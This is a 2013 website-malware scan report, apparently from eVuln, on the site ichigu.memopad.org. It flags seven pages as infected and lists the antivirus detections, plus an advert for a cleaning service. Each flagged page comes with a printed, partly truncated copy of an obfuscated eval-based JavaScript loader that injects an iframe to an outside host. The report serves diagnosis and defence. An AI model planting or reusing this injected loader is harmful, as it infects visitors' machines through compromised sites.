Google: ichigu.memopad.org is suspicuous website

New scan:

ichigu.memopad.org

(cached results from Fri Aug 16 15:54:50 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

  • Website cleaning
  • Redirects removal
  • Log files inspection
  • Reason eliminating
  • Blacklists removal
  • One year monitoring
  • Repeated fixing

website(s)

$119.00

Malicious/Suspicious/Total urls checked
7/0/10
7 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ichigu.memopad.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here are our suggestions how to fix this.
Malicious redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Setup daily monitoring of ichigu.memopad.org

Paste the following HTML code anywhere into "ichigu.memopad.org" website.

eVuln.com

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ichigu.memopad.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ichigu.memopad.org/
200 OK
Content-Length: 12613
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_
... 3255 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://ichigu.memopad.org/index.htm
200 OK
Content-Length: 12613
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_
... 3255 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://ichigu.memopad.org/mail.htm
200 OK
Content-Length: 21605
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_
... 3255 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://ichigu.memopad.org/concept.htm
200 OK
Content-Length: 12478
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_
... 3255 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://ichigu.memopad.org/report.htm
200 OK
Content-Length: 19867
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_
... 3255 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://ichigu.memopad.org/application.htm
200 OK
Content-Length: 11219
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_
... 3255 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://ichigu.memopad.org/intro.htm
200 OK
Content-Length: 13142
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_
... 3255 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://ichigu.memopad.org/test404page.js
404 Not Found
Content-Length: 283
Content-Type: text/html
clean
http://ichigu.memopad.org/meeting.jpg
404 Not Found
Content-Length: 280
Content-Type: text/html
clean
http://ichigu.memopad.org/pdf/2013.01%20ichigu40.pdf
200 OK
Content-Length: 153138
Content-Type: application/pdf
clean

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: ichigu.memopad.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Aug 2013 12:54:51 GMT
Accept-Ranges: bytes
ETag: "1939426-3145-51e634fa"
Server: Apache/1.3.41 (Unix) PHP/5.2.11 with Suhosin-Patch mod_perl/1.31 mod_tsunami/3.0 mod_ssl/2.8.31 OpenSSL/0.9.8l
Content-Length: 12613
Content-Type: text/html
Last-Modified: Wed, 17 Jul 2013 06:08:58 GMT

...12613 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ichigu.memopad.org
Referer: http://www.google.com/search?q=ichigu.memopad.org

Result:
The result is similar to the first query. There are no suspicious redirects found.
Infected sites found